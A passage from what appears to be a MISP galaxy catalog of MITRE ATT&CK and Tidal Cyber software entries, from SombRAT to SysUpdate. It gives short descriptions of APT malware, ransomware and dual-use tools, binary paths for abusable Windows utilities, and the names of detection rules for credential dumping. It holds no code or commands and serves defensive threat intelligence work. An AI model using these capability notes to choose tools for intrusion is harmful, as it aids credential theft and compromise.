UUID 0ec24158-d5d7-4d2e-b5a5-bc862328a317 which can be used as unique global reference for SombRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0615
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

SoreFang

SoreFang is a first-stage downloader used by APT29 for exfiltration and to load other malware.[NCSC APT29 July 2020][CISA SoreFang July 2016]

Internal MISP references

UUID 3e959586-14ff-407b-a0d0-4e9580546f3f which can be used as unique global reference for SoreFang in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0516
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

SOUNDBITE

SOUNDBITE is a signature backdoor used by APT32. [FireEye APT32 May 2017]

Internal MISP references

UUID 069538a5-3cb8-4eb4-9fbb-83867bb4d826 which can be used as unique global reference for SOUNDBITE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0157
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

SPACESHIP

SPACESHIP is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]

Internal MISP references

UUID 0f8d0a73-9cd3-475a-b31b-d457278c921a which can be used as unique global reference for SPACESHIP in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0035
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Spark

Spark is a Windows backdoor and has been in use since as early as 2017.[Unit42 Molerat Mar 2020]

Internal MISP references

UUID 93f8c180-6794-4e9c-b716-6b31f42eb72d which can be used as unique global reference for Spark in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0543
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

SpeakUp

SpeakUp is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. [CheckPoint SpeakUp Feb 2019]

Internal MISP references

UUID b9b67878-4eb1-4a0b-9b36-a798881ed566 which can be used as unique global reference for SpeakUp in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux']
software_attack_id S0374
source MITRE
type ['malware']

Sphynx

Sphynx is a variant of BlackCat ransomware (AKA ALPHV or Noberus) first observed in early 2023, which features multiple defense evasion-focused enhancements over the BlackCat strain. For example, Sphynx uses a more complex set of execution parameters, its configuration details are formatted as raw structures instead of JSON, and observed samples contain large amounts of “junk” code and encrypted strings.[X-Force BlackCat May 30 2023] Sphynx also features built-in versions of other tools to support specific functions, including the open-source Impacket tool for lateral movement and Remcom, a hacking tool that facilitates remote code execution.[Microsoft Threat Intelligence Tweet August 17 2023]

Internal MISP references

UUID cdbebd0a-3036-4a24-b1d5-a3f0ca9c758e which can be used as unique global reference for Sphynx in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5055
source Tidal Cyber
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

SpicyOmelette

SpicyOmelette is a JavaScript-based remote access tool that has been used by Cobalt Group since at least 2018.[Secureworks GOLD KINGSWOOD September 2018]

Internal MISP references

UUID 2be9e22d-0af8-46f5-b30e-b3712ccf716d which can be used as unique global reference for SpicyOmelette in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0646
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Splashtop

Splashtop is a tool used to enable remote connections to network devices for support and administration.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID ecf8b878-19e5-425b-bc34-d5ed6e999fea which can be used as unique global reference for Splashtop in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5009
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '9bc47297-864d-4f39-be37-ad9379102853', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

spwebmember

spwebmember is a Microsoft SharePoint enumeration and data dumping tool written in .NET. [NCC Group APT15 Alive and Strong]

Internal MISP references

UUID 0fdabff3-d996-493c-af67-f3ac02e4b00b which can be used as unique global reference for spwebmember in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0227
source MITRE
tags ['cd1b5d44-226e-4405-8985-800492cf2865', '4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['tool']
Related clusters

To see the related clusters, click here.

Sqldumper

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Debugging utility included with Microsoft SQL.

Author: Oddvar Moe

Paths:
* C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
* C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe

Resources:
* https://twitter.com/countuponsec/status/910969424215232518
* https://twitter.com/countuponsec/status/910977826853068800
* https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se

Detection:
* Sigma: proc_creation_win_lolbin_susp_sqldumper_activity.yml
* Elastic: credential_access_lsass_memdump_file_created.toml
* Elastic: credential_access_cmdline_dump_tool.toml

[Sqldumper.exe - LOLBAS Project]

Internal MISP references

UUID 146bd853-166b-4859-b4d7-b70f51bfd8e9 which can be used as unique global reference for Sqldumper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5235
source Tidal Cyber
tags ['e992169d-832d-44e9-8218-0f4ab0ff72b4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

sqlmap

sqlmap is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. [sqlmap Introduction]

Internal MISP references

UUID 96c224a6-6ca4-4ac1-9990-d863ec5a317a which can be used as unique global reference for sqlmap in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0225
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

Sqlps

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are PowerShell v2. Microsoft SQL Server\120 and 130 are PowerShell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but still included with the installation for compatibility reasons.

Author: Oddvar Moe

Paths:
* C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
* C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
* C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe
* C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
* C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe

Resources:
* https://twitter.com/ManuelBerrueta/status/1527289261350760455
* https://twitter.com/bryon_/status/975835709587075072
* https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017

Detection:
* Sigma: proc_creation_win_mssql_sqlps_susp_execution.yml
* Sigma: image_load_dll_system_management_automation_susp_load.yml
* Elastic: execution_suspicious_powershell_imgload.toml
* Splunk: 2021-10-05-suspicious_copy_on_system32.md

[Sqlps.exe - LOLBAS Project]

Internal MISP references

UUID 5b3c03d3-9ea1-4322-a422-ab2401ffc294 which can be used as unique global reference for Sqlps in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5236
source Tidal Cyber
tags ['da7e88fd-2d71-4928-81ce-e3d455b3d418', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

SQLRat

SQLRat is malware that executes SQL scripts to avoid leaving traditional host artifacts. FIN7 has been observed using it.[Flashpoint FIN 7 March 2019]

Internal MISP references

UUID 612f780a-239a-4bd0-a29f-63beadf3ed22 which can be used as unique global reference for SQLRat in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0390
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

SQLToolsPS

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Tool included with Microsoft SQL that loads SQL Server cmdlets. A replacement for sqlps.exe; its successor in SQL Server 2016 and later.

Author: Oddvar Moe

Paths:
* C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe

Resources:
* https://twitter.com/pabraeken/status/993298228840992768
* https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017

Detection:
* Sigma: proc_creation_win_mssql_sqltoolsps_susp_execution.yml
* Splunk: 2021-10-05-suspicious_copy_on_system32.md

[SQLToolsPS.exe - LOLBAS Project]

Internal MISP references

UUID 9271e5cf-f788-4d7d-9c7a-8d5e37cbb9a6 which can be used as unique global reference for SQLToolsPS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5237
source Tidal Cyber
tags ['f4867256-402a-4bcb-97d3-e071ee0993c1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Squirrel

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Author: Reegun J (OCBC Bank) - @reegun21

Paths:
* %localappdata%\Microsoft\Teams\current\Squirrel.exe

Resources:
* https://www.youtube.com/watch?v=rOP3hnkj7ls
* https://twitter.com/reegun21/status/1144182772623269889
* http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
* https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
* https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56

Detection:
* Sigma: proc_creation_win_lolbin_squirrel.yml

[Squirrel.exe - LOLBAS Project]

Internal MISP references

UUID 13d5d060-8462-4592-8efb-2243fd2138d1 which can be used as unique global reference for Squirrel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5238
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Squirrelwaffle

Squirrelwaffle is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as Cobalt Strike and the QakBot banking trojan.[ZScaler Squirrelwaffle Sep 2021][Netskope Squirrelwaffle Oct 2021]

Internal MISP references

UUID 46943a69-0b19-4d3a-b2a3-1302e85239a3 which can be used as unique global reference for Squirrelwaffle in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1030
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

ssh

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Ssh.exe is the OpenSSH-compatible client that can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.

Author: Akshat Pradhan

Paths:
* c:\windows\system32\OpenSSH\ssh.exe

Resources:
* https://gtfobins.github.io/gtfobins/ssh/

Detection:
* Sigma: proc_creation_win_lolbin_ssh.yml
* IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
* IOC: command line arguments specifying execution.

[ssh.exe - LOLBAS Project]

Internal MISP references

UUID 7b607493-5035-4e29-9f95-55362f53b805 which can be used as unique global reference for ssh in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5164
source Tidal Cyber
tags ['6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '64a55f86-15db-4599-b165-81be7f024397', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

SslMM

SslMM is a full-featured backdoor used by Naikon that has multiple variants. [Baumgartner Naikon 2015]

Internal MISP references

UUID 3334a124-3e74-4a90-8ed1-55eea3274b19 which can be used as unique global reference for SslMM in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0058
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Starloader

Starloader is a loader component that has been observed loading Felismus and associated tools. [Symantec Sowbug Nov 2017]

Internal MISP references

UUID fc18e220-2200-4d70-a426-0700ba14c4c0 which can be used as unique global reference for Starloader in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0188
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

STARWHALE

STARWHALE is a Windows Script File (WSF) backdoor that has been used by MuddyWater, possibly since at least November 2021; there is also a STARWHALE variant written in Golang with similar capabilities. Security researchers have also noted the use of STARWHALE by UNC3313, which may be associated with MuddyWater.[Mandiant UNC3313 Feb 2022][DHS CISA AA22-055A MuddyWater February 2022]

Internal MISP references

UUID 764c6121-2d15-4a10-ac53-b1c431dc8b47 which can be used as unique global reference for STARWHALE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1037
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

StoneDrill

StoneDrill is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with APT33.[FireEye APT33 Sept 2017][Kaspersky StoneDrill 2017]

Internal MISP references

UUID 9eee52a2-5ac1-4561-826c-23ec7fbc7876 which can be used as unique global reference for StoneDrill in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0380
source MITRE
tags ['2e621fc5-dea4-4cb9-987e-305845986cd3']
type ['malware']
Related clusters

To see the related clusters, click here.

Stordiag

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Storage diagnostic tool

Author: Eral4m

Paths:
* c:\windows\system32\stordiag.exe
* c:\windows\syswow64\stordiag.exe

Resources:
* https://twitter.com/eral4m/status/1451112385041911809

Detection:
* Sigma: proc_creation_win_stordiag_susp_child_process.yml
* IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\

[Stordiag.exe - LOLBAS Project]

Internal MISP references

UUID 7430c53f-41a0-4395-88c7-fc2c34ee52c7 which can be used as unique global reference for Stordiag in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5165
source Tidal Cyber
tags ['f0e3d6ea-d7ea-4d73-b868-1076fac744a8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

StreamEx

StreamEx is a malware family that has been used by Deep Panda since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. [Cylance Shell Crew Feb 2017]

Internal MISP references

UUID 502b490c-2067-40a4-8f73-7245d7910851 which can be used as unique global reference for StreamEx in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0142
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

StrifeWater

StrifeWater is a remote-access tool that has been used by Moses Staff in the initial stages of their attacks since at least November 2021.[Cybereason StrifeWater Feb 2022]

Internal MISP references

UUID dd8bb0a3-6cb1-412d-adeb-cbaae98462a9 which can be used as unique global reference for StrifeWater in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1034
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

StrongPity

StrongPity is an information stealing malware used by PROMETHIUM.[Bitdefender StrongPity June 2020][Talos Promethium June 2020]

Internal MISP references

UUID ed563524-235e-4e06-8c69-3f9d8ddbfd8a which can be used as unique global reference for StrongPity in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0491
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Stuxnet

Stuxnet was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011][CISA ICS Advisory ICSA-10-272-01][ESET Stuxnet Under the Microscope][Langer Stuxnet] Stuxnet was discovered in 2010, with some components being used as early as November 2008.[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011]

Internal MISP references

UUID 3fdf3833-fca9-4414-8d2e-779dabc4ee31 which can be used as unique global reference for Stuxnet in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0603
source MITRE
tags ['a98d7a43-f227-478e-81de-e7299639a355']
type ['malware']

S-Type

S-Type is a backdoor that was used in Operation Dust Storm since at least 2013.[Cylance Dust Storm]

Internal MISP references

UUID b19b6c38-d38b-46f2-a535-d0bfc5790368 which can be used as unique global reference for S-Type in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0085
source MITRE
type ['malware']

SUGARDUMP

SUGARDUMP is a proprietary browser credential harvesting tool that was used by UNC3890 during the C0010 campaign. The first known SUGARDUMP version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.[Mandiant UNC3890 Aug 2022]

Internal MISP references

UUID 6ff7bf2e-286c-4b1b-92a0-1e5322870c59 which can be used as unique global reference for SUGARDUMP in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1042
source MITRE
type ['malware']

SUGARUSH

SUGARUSH is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. SUGARUSH was first identified during analysis of UNC3890's C0010 campaign targeting Israeli companies, which began in late 2020.[Mandiant UNC3890 Aug 2022]

Internal MISP references

UUID 004c781a-3d7d-446b-9677-a042c8f6566e which can be used as unique global reference for SUGARUSH in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1049
source MITRE
type ['malware']

SUNBURST

SUNBURST is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by APT29 since at least February 2020.[SolarWinds Sunburst Sunspot Update January 2021][Microsoft Deep Dive Solorigate January 2021]

Internal MISP references

UUID 6b04e98e-c541-4958-a8a5-d433e575ce78 which can be used as unique global reference for SUNBURST in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0559
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

SUNSPOT

SUNSPOT is an implant that injected the SUNBURST backdoor into the SolarWinds Orion software update framework. It was used by APT29 since at least February 2020.[CrowdStrike SUNSPOT Implant January 2021]

Internal MISP references

UUID 66966a12-3db3-4e43-a7e8-6c6836ccd8fe which can be used as unique global reference for SUNSPOT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0562
source MITRE
tags ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

SUPERNOVA

SUPERNOVA is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of APT29's SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests SUPERNOVA may have been used by the China-based threat group SPIRAL.[Guidepoint SUPERNOVA Dec 2020][Unit42 SUPERNOVA Dec 2020][SolarWinds Advisory Dec 2020][CISA Supernova Jan 2021][Microsoft Analyzing Solorigate Dec 2020]

Internal MISP references

UUID f02abaee-237b-4891-bb5d-30ca86dfc2c8 which can be used as unique global reference for SUPERNOVA in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0578
source MITRE
type ['malware']

SVCReady

SVCReady is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between TA551 activity and SVCReady distribution, including similarities in file names, lure images, and identical grammatical errors.[HP SVCReady Jun 2022]

Internal MISP references

UUID a8110f81-5ee9-5819-91ce-3a57aa330dcb which can be used as unique global reference for SVCReady in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1064
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

Sykipot

Sykipot is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of Sykipot hijacks smart cards on victims. [Alienvault Sykipot DOD Smart Cards] The group using this malware has also been referred to as Sykipot. [Blasco 2013]

Internal MISP references

UUID ae749f9c-cf46-42ce-b0b8-f0be8660e3f3 which can be used as unique global reference for Sykipot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0018
source MITRE
type ['malware']

SynAck

SynAck is a variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. [SecureList SynAck Doppelgänging May 2018] [Kaspersky Lab SynAck May 2018]

Internal MISP references

UUID 19ae8345-745e-4872-8a29-d56c8800d626 which can be used as unique global reference for SynAck in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0242
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

Syncappvpublishingserver

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Script used related to app-v and publishing server

Author: Oddvar Moe

Paths:
* C:\Windows\System32\SyncAppvPublishingServer.vbs

Resources:
* https://twitter.com/monoxgas/status/895045566090010624
* https://twitter.com/subTee/status/855738126882316288

Detection:
* Sigma: proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml

[Syncappvpublishingserver.vbs - LOLBAS Project]

Internal MISP references

UUID 6af0eac2-c35f-4569-ae09-47f1ca846961 which can be used as unique global reference for Syncappvpublishingserver in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5261
source Tidal Cyber
tags ['9e504206-7a84-40a5-b896-8995d82e3586', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

SyncAppvPublishingServer

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by App-v to get App-v server lists

Author: Oddvar Moe

Paths:
* C:\Windows\System32\SyncAppvPublishingServer.exe
* C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

Resources:
* https://twitter.com/monoxgas/status/895045566090010624

Detection:
* Sigma: posh_ps_syncappvpublishingserver_exe.yml
* Sigma: posh_pm_syncappvpublishingserver_exe.yml
* Sigma: proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
* IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed

[SyncAppvPublishingServer.exe - LOLBAS Project]

Internal MISP references

UUID f2928533-34e1-4599-a3ec-c8b4ef9d81b4 which can be used as unique global reference for SyncAppvPublishingServer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5166
source Tidal Cyber
tags ['acda137a-d1c9-4216-9c08-d07c8d899725', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

SYNful Knock

SYNful Knock is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.[Mandiant - Synful Knock][Cisco Synful Knock Evolution]

Internal MISP references

UUID 69ab291d-5066-4e47-9862-1f5c7bac7200 which can be used as unique global reference for SYNful Knock in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Network']
software_attack_id S0519
source MITRE
tags ['b20e7912-6a8d-46e3-8e13-9a3fc4813852']
type ['malware']

Sys10

Sys10 is a backdoor that was used throughout 2013 by Naikon. [Baumgartner Naikon 2015]

Internal MISP references

UUID 2df35a92-2295-417a-af5a-ba5c943ef40d which can be used as unique global reference for Sys10 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0060
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

SYSCON

SYSCON is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. SYSCON has been delivered by the CARROTBALL and CARROTBAT droppers.[Unit 42 CARROTBAT November 2018][Unit 42 CARROTBAT January 2020]

Internal MISP references

UUID ea556a8d-4959-423f-a2dd-622d0497d484 which can be used as unique global reference for SYSCON in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0464
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

Syssetup

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows NT System Setup

Author: LOLBAS Team

Paths:
* c:\windows\system32\syssetup.dll
* c:\windows\syswow64\syssetup.dll

Resources:
* https://twitter.com/pabraeken/status/994392481927258113
* https://twitter.com/harr0ey/status/975350238184697857
* https://twitter.com/bohops/status/975549525938135040
* https://windows10dll.nirsoft.net/syssetup_dll.html

Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml
* Splunk: detect_rundll32_application_control_bypass___syssetup.yml

[Syssetup.dll - LOLBAS Project]

Internal MISP references

UUID 5d220e4f-db5f-4523-8dc5-63a604f3964b which can be used as unique global reference for Syssetup in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5199
source Tidal Cyber
tags ['9105775d-bdcb-45cc-895d-6c7bbb3d30ce', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

SystemBC

SystemBC is a commodity backdoor malware used as a Tor proxy and remote access Trojan (RAT). It was used during the high-profile 2021 Colonial Pipeline DarkSide ransomware attack and has since been used as a persistence and lateral movement tool during other ransomware compromises, including intrusions involving Ryuk, Egregor, and Play.[BlackBerry SystemBC June 10 2021][Sophos SystemBC December 16 2020][WithSecure SystemBC May 10 2021][Trend Micro Play Ransomware September 06 2022] According to Mandiant's 2023 M-Trends report, SystemBC was the second most frequently seen malware family in 2022, behind only Cobalt Strike Beacon.[TechRepublic M-Trends 2023]

Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/systembc/

PulseDive (IOCs): https://pulsedive.com/threat/SystemBC

Internal MISP references

UUID c30929fb-28a1-407c-a1c3-a83374c63267 which can be used as unique global reference for SystemBC in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5058
source Tidal Cyber
tags ['15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Systeminfo

Systeminfo is a Windows utility that can be used to gather detailed information about a computer. [TechNet Systeminfo]

Internal MISP references

UUID cecea681-a753-47b5-9d77-c10a5b4403ab which can be used as unique global reference for Systeminfo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0096
source MITRE
tags ['7b918200-2c8d-4b86-a81b-b2bdec5b2c2b', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

SysUpdate

SysUpdate is a backdoor written in C++ that has been used by Threat Group-3390 since at least 2020.[Trend Micro Iron Tiger April 2021]

Internal MISP references

